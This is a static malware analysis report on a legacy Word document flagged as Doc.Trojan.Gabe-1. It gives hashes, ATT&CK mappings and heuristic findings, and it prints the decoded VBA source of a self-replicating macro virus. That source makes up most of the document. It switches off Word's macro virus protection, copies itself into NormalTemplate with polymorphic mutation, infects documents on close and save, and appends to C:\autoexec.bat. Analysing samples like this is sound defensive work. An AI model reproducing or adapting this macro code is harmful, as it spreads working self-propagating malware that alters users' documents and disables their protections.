Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5ddd70e9b1e3d820…

MALICIOUS

Office (OLE)

50.0 KB Created: 1999-04-23 11:57:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 780367655aaf25cdb382e51b06ece000 SHA-1: 50273ca0886014c586a81dca4d5c0d94cc57c21e SHA-256: 5ddd70e9b1e3d820c6ce51013df29371a5a168371959644312be8bb8f8583880
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing both WordBasic and VBA macros. The AutoOpen macro attempts to obfuscate its code and modify the NormalTemplate, a common technique for persistence or further infection. It also attempts to append to C:\autoexec.bat, indicating an intent to execute further malicious code.

Heuristics 5

  • ClamAV: Doc.Trojan.Gabe-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Gabe-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13351 bytes
SHA-256: 9217257ae52fe44583b5edd4426c78661d1a873ce1a623fe70dbb1214d8e38eb
Detection
ClamAV: Doc.Trojan.Gabe-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fUY"
Sub AutoOpen()
'PolyMorphing Viruz by MI_pirat
'CodeNAME: Kewl--NOT!
On Error Resume Next
StatusBar = "<< Kewl lives somewhere in HERE >>"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Kewl") <> "Kaka" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Kewl") = "Kaka"
Options.VirusProtection = (2 Xor 2)
Dim nr, xxx, nume
nume = Chr(Int((100 * Rnd) + 32)) + Chr(Int((100 * Rnd) + 32)) + Chr(Int((100 * Rnd) + 32))
ActiveDocument.VBProject.VBComponents(2).Name = nume
nr = ActiveDocument.VBProject.VBComponents.Item(2).CodeModule.CountOfLines
Set myTemplate = NormalTemplate
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=myTemplate.FullName, Name:=nume, Object:=wdOrganizerObjectProjectItems
For i = 1 To nr
xxx = ActiveDocument.VBProject.VBComponents(2).CodeModule.Lines(i, 1)
poly = Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32))
strn = xxx + " '" + poly
NormalTemplate.VBProject.VBComponents.Item(2).CodeModule.ReplaceLine i, strn
Next i
Documents.Open FileName:=NormalTemplate.FullName, ConfirmConversions:=False, ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", WritePasswordTemplate:="", Format:=wdOpenFormatAuto
ActiveDocument.Save
ActiveDocument.Close
'Some publicity doesn't hurt anyone
Open "C:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "echo MI_pirat"
Print #1, "echo Kewl LiVeS SoMeWhErE In YoUr SyStEm ---- ENDjoy"
Print #1, "echo."
Close #1
End If
End Sub
Sub AutoClose()
'Errr.. spead me
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") + 1
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") >= 10 Then MsgBox "Are U havn' phun ?", vbYesNo, "Kewl has spead considerably !"
Dim nume, myTemplate
myTemplate = NormalTemplate
nume = NormalTemplate.VBProject.VBComponents(2).Name
For Each aVar In ActiveDocument.Variables
    If aVar.Name = "Inf" Then num = aVar.Index
Next aVar
If (num = 0) And (ActiveDocument.FullName <> myTemplate.FullName) Then
ActiveDocument.Variables.Add Name:="Inf"
ActiveDocument.Variables("Inf").Value = 1
Set myTemplate = ActiveDocument.AttachedTemplate
Application.OrganizerCopy Source:=myTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=nume, Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
End Sub
Sub AutoSave()
'Sure...Hehe infect it everytime
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") + 1
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") >= 10 Then MsgBox "Are U havn' phun ?", vbYesNo, "Kewl has spead considerably !"
On Error Resume Next
Dim nume, myTemplate
myTemplate = NormalTemplate
nume = NormalTemplate.VBProject.VBComponents(2).Name
For Each aVar In ActiveDocument.Variables
    If aVar.Name = "Inf" Then num = aVar.Index
Next aVar
If (num = 0) And (ActiveDocument.FullName <> myTemplate.FullName) Then
ActiveDocument.Variables.Add Name:="Inf"
ActiveDocument.Variables("Inf").Value = 1
Set myTemplate = ActiveDocument.AttachedTemplate
Application.OrganizerCopy Source:=myTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=nume, Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/4837d5a8c9234c9983ca06e812e77b7e.bin
' ====================================================
... (truncated)